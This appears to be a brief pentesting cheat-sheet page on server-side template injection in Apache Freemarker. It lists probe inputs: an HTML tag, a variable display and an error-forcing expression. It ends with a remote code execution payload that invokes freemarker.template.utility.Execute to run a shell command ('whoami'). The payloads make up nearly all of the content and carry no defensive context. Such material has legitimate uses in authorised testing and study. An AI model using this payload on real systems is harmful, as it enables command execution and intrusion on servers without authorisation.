Apache Freemarker is a template engine, sometimes used with Java application.
Older Freemarker engines did not prevent HTML in strings. Therefore, try in a field something like this:
Ha<b>llo</b>
Show the value of a variable:
${var}
Execution to force an error message:
${'a'*5}
RCE:
${"freemarker.template.utility.Execute"?new()("whoami")}
Leave a Reply
You must be logged in to post a comment.